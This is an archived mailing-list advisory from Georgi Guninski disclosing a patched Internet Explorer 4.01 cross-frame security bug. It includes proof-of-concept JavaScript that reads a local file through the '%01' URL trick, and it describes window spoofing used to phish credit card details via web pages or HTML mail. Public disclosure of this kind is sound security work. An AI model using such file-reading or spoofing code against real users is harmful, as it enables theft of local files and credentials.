There is a Javascript security bug in Internet Explorer 4.01 (patched), which circumvents "Cross-frame security" and opens several security holes. The problem is: if you add '%01someURL' after the URL, IE thinks that the document is loaded from the domain of 'someURL'. Very strange? Some of the bugs are: 1) IE allows reading local files and sending them to an arbitrary server. The filename must be known. The bug may be exploited using HTML mail message. Demo is available at: http://www.geocities.com/ResearchTriangle/1711/read3.html This works on IE 4.0 also. The javascript code is: alert('Create a short file C:\\test.txt and its contents will be shown in a dialog box.') b=showModalDialog("about:<SCRIPT>a=window.open('file://c:/test.txt');s='Here is your file: \\n\\n'+a.document.body.innerText;alert(s);a.close();close()</"+"SCRIPT>%01file://c:/"); 2) IE allows "window spoofing". After visiting a hostile page (or clicking a hostile link) a window is opened and its location is a trusted site. However, the content of the window is not that of the original site, but it is supplied by the owner of the page. So, the user is misled he is browising a trusted site, while he is browsing a hostile page and may provide sensitive information, such as credit card number. The bug may be exploited using HTML mail message. Demo is available at: http://www.geocities.com/ResearchTriangle/1711/read4.html Workaround: Disable Javascript Regards, Georgi Guninski TechnoLogica Ltd, Bulgaria http://www.geocities.com/ResearchTriangle/1711 http://www.whitehats.com/guninski ______________________________________________________ Get Your Private, Free Email at http://www.hotmail.com
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:31:11 PDT